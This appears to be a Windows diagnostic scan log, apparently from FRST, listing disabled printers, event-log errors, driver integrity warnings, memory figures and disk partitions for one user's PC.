==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

==================== Faulty Device Manager Devices =============

Name: Microsoft 6to4 Adapter #2
Description: Microsoft 6to4 Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device is not working properly because Windows cannot load the drivers required for this device. (Code 31)
Resolution: Update the driver

Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet 1022n
Description: HP LaserJet 1022n
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: Deskjet 6940 series
Description: Deskjet 6940 series
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: hp LaserJet 2420
Description: hp LaserJet 2420
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: Deskjet 6980 series
Description: Deskjet 6980 series
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: Deskjet 6980 series
Description: Deskjet 6980 series
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet P2035n
Description: HP LaserJet P2035n
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet CP1025nw
Description: HP LaserJet CP1025nw
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP Color LaserJet CP2025dn
Description: HP Color LaserJet CP2025dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet Professional P1606dn
Description: HP LaserJet Professional P1606dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet P2035n
Description: HP LaserJet P2035n
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP LaserJet 200 color M251nw
Description: HP LaserJet 200 color M251nw
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP Color LaserJet CP2025dn
Description: HP Color LaserJet CP2025dn
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

==================== Event log errors: =========================

Application errors:
==================
Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\INDEX> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f)

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\DATA_3> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f)

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\DATA_2> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f)

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CACHE\DATA_1> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f)

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\CURRENT SESSION> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f)

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\SHORTCUTS> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f)

Error: (08/25/2014 01:41:28 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\SHORTCUTS-JOURNAL> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f)

Error: (08/25/2014 01:41:27 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOGIN DATA> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f)

Error: (08/25/2014 01:41:27 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOGIN DATA-JOURNAL> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f)

Error: (08/25/2014 01:41:27 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\WEB DATA> in the hash map cannot be updated. Context: Application, SystemIndex Catalog Details:A device attached to the system is not functioning. (0x8007001f)

System errors:
=============
Error: (08/25/2014 01:43:07 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)
Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

Error: (08/25/2014 01:36:58 PM) (Source: VDS Dynamic Provider) (EventID: 10) (User: )
Description: The provider failed while storing notifications from the driver. The Virtual Disk Service should be restarted. hr=80042505

Error: (08/25/2014 01:20:43 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)
Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

Error: (08/25/2014 01:08:55 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)
Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

Error: (08/25/2014 00:58:18 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)
Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

Error: (08/25/2014 00:14:03 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)
Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

Error: (08/25/2014 00:04:56 PM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)
Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

Error: (08/25/2014 11:55:18 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)
Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

Error: (08/25/2014 11:45:56 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)
Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

Error: (08/25/2014 11:26:20 AM) (Source: DCOM) (EventID: 10016) (User: savaskyriaki-PC)
Description: application-specificLocalActivation{4991D34B-80A1-4291-83B6-3328366B9097}savaskyriaki-PCsavas.kyriakidisS-1-5-21-3726736968-409882640-1958551794-1000LocalHost (Using LRPC)

Microsoft Office Sessions:
=========================
Error: (08/14/2012 04:50:33 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 3, Application Name: Microsoft Office PowerPoint, Application Version: 12.0.6600.1000, Microsoft Office Version: 12.0.6425.1000. This session lasted 228 seconds with 60 seconds of active time. This session ended with a crash.

Error: (12/21/2010 06:24:53 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 61 seconds with 60 seconds of active time. This session ended with a crash.

Error: (10/09/2010 05:15:00 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6541.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 19 seconds with 0 seconds of active time. This session ended with a crash.

Error: (03/25/2010 00:21:12 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6504.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 60 seconds with 0 seconds of active time. This session ended with a crash.

CodeIntegrity Errors:
===================================
Date: 2014-08-25 13:41:40.016
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-25 13:41:39.905
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-25 13:41:39.794
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-25 13:41:39.682
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.

Date: 2014-08-25 13:41:39.419
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
Date: 2014-08-25 13:41:39.308 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 13:41:39.196 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 13:41:39.070 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 13:41:27.280 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system. Date: 2014-08-25 13:41:27.171 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system. 
==================== Memory info ===========================

Processor: Intel® Core2 Duo CPU E4600 @ 2.40GHz
Percentage of memory in use: 49%
Total physical RAM: 3060.46 MB
Available physical RAM: 1540.3 MB
Total Pagefile: 6353.2 MB
Available Pagefile: 4717.66 MB
Total Virtual: 2047.88 MB
Available Virtual: 1907.04 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:450.71 GB) (Free:222.38 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (RECOVERY) (Fixed) (Total:15 GB) (Free:10.55 GB) NTFS
Drive f: (CC) (Removable) (Total:1.92 GB) (Free:1.88 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 10000000)
Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)
Partition 2: (Not Active) - (Size=15 GB) - (Type=07 NTFS)
Partition 3: (Active) - (Size=450.7 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (Size: 1.9 GB) (Disk ID: E79A82AA)
Partition 1: (Active) - (Size=1.9 GB) - (Type=07 NTFS)

==================== End Of Log ============================